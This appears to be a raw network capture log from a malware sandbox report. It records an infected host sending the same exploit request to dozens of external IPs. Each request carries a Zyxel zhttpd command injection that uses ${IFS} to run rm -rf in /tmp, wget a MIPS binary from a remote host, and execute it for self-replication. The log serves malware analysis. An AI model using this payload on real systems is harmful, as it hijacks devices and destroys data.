                              Mar 31, 2024 08:41:58.217492104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7464192.168.2.133436268.186.211.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.217549086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7465192.168.2.1358986221.190.25.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.217612982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7466192.168.2.135321438.121.214.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.217643976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7467192.168.2.133910486.12.240.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.217708111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7468192.168.2.1354966190.142.143.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.217787027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7469192.168.2.135261467.70.232.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.217848063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7470192.168.2.1355228131.63.7.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.217905998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7471192.168.2.133834647.135.206.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.217961073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7472192.168.2.1356566119.223.61.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.218030930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7473192.168.2.1355604213.82.210.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.218091011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7474192.168.2.1359452203.145.14.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.218146086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7475192.168.2.13402048.72.50.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.218214989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7476192.168.2.1344096100.201.44.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.218274117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7477192.168.2.1336006170.77.255.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.218341112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7478192.168.2.1345442168.121.14.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.218358994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7479192.168.2.1336594107.191.253.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.218421936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7480192.168.2.1351080144.98.58.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.218482018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7481192.168.2.13507909.157.238.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.218549013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7482192.168.2.1346812140.184.203.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.218621969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7483192.168.2.1343044121.213.170.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.218691111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7484192.168.2.134357446.79.4.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.218750954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7485192.168.2.1339162105.139.67.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.218802929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7486192.168.2.1336614162.74.232.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.218847036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7487192.168.2.1336704167.242.171.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.218924999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7488192.168.2.1341070120.133.159.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.218986034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7489192.168.2.135035875.239.58.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.219023943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7490192.168.2.1360944189.28.29.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.219069958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7491192.168.2.135042679.131.8.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.219125032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7492192.168.2.1335882142.138.53.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.219213009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7493192.168.2.1339708119.11.254.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.219268084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7494192.168.2.133462042.230.232.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.219336033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7495192.168.2.134148646.251.45.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.219399929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7496192.168.2.1345854125.194.239.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.219465017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7497192.168.2.1340242195.42.235.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.219527960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7498192.168.2.1334034152.64.130.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.219589949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7499192.168.2.1359338203.107.185.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.219651937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7500192.168.2.135507878.215.194.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.219697952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7501192.168.2.1334062166.148.243.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.219748974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7502192.168.2.134203674.185.13.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.219808102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7503192.168.2.1335868140.43.176.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.219873905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7504192.168.2.1344038137.85.77.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.219933987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7505192.168.2.1359306131.193.10.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.219990969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7506192.168.2.1341662171.85.130.139443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.220036983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7507192.168.2.1352032172.183.216.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.220103979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7508192.168.2.1344738114.1.64.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.220175028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7509192.168.2.13563908.34.157.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.220237017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7510192.168.2.135634614.211.160.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.220293999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7511192.168.2.1348270222.117.186.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.220355988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7512192.168.2.134328257.244.192.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.220439911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7513192.168.2.134192288.164.229.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.220480919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7514192.168.2.1350148190.158.33.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.220562935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7515192.168.2.1350634168.191.248.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.220618963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7516192.168.2.133429268.68.160.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.220673084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7517192.168.2.134880078.141.44.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.220731974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7518192.168.2.1358812185.1.3.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.220787048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7519192.168.2.1334092204.243.54.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.220839977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7520192.168.2.134142460.171.224.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.220901012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7521192.168.2.1336078163.189.188.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.220973969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7522192.168.2.1346408180.27.58.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.221033096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7523192.168.2.134595231.35.82.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.221098900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7524192.168.2.135300087.47.11.161443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.221174955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7525192.168.2.135358020.201.194.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.221214056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7526192.168.2.135264669.1.164.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.221292019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7527192.168.2.134347086.226.152.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.221323967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7528192.168.2.133426237.188.48.206443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.221399069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7529192.168.2.135032047.119.226.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.221450090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7530192.168.2.133495251.155.178.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.221513987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7531192.168.2.134641848.58.245.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.221580982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7532192.168.2.1348602186.85.140.153443
                              TimestampBytes transferredDirectionData
